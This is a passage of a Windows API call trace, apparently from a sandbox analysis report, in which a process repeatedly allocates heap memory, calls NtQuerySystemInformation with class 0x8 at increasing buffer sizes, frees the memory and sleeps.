ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.738] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.738] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.739] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.739] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.740] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.740] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.740] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.740] Sleep (dwMilliseconds=0x110) [0197.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.754] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.754] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.755] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.755] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.755] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.755] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.756] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.756] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.756] Sleep (dwMilliseconds=0x110) [0197.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.769] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.769] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.770] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.770] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.770] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.770] Sleep (dwMilliseconds=0x110) [0197.778] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.778] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.779] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.786] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.786] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.787] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.787] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.788] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.788] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.788] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.788] Sleep (dwMilliseconds=0x110) [0197.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.796] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.796] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.797] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.799] Sleep (dwMilliseconds=0x110) [0197.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.816] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.816] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.817] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.817] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.817] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.818] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.818] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.818] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.819] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.819] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.819] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.819] Sleep (dwMilliseconds=0x110) [0197.825] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.825] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.826] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.826] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.826] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.829] Sleep (dwMilliseconds=0x110) [0197.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.848] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.848] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.849] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.850] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.850] Sleep (dwMilliseconds=0x110) [0197.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.863] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.864] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.864] Sleep (dwMilliseconds=0x110) [0197.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.879] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.880] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.880] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.880] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.880] Sleep (dwMilliseconds=0x110) [0197.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.891] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.894] Sleep (dwMilliseconds=0x110) [0197.903] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.903] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.904] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.904] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.904] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.911] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.912] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.912] Sleep (dwMilliseconds=0x110) [0197.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.926] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.927] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.928] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.928] Sleep (dwMilliseconds=0x110) [0197.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.942] Sleep (dwMilliseconds=0x110) [0197.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 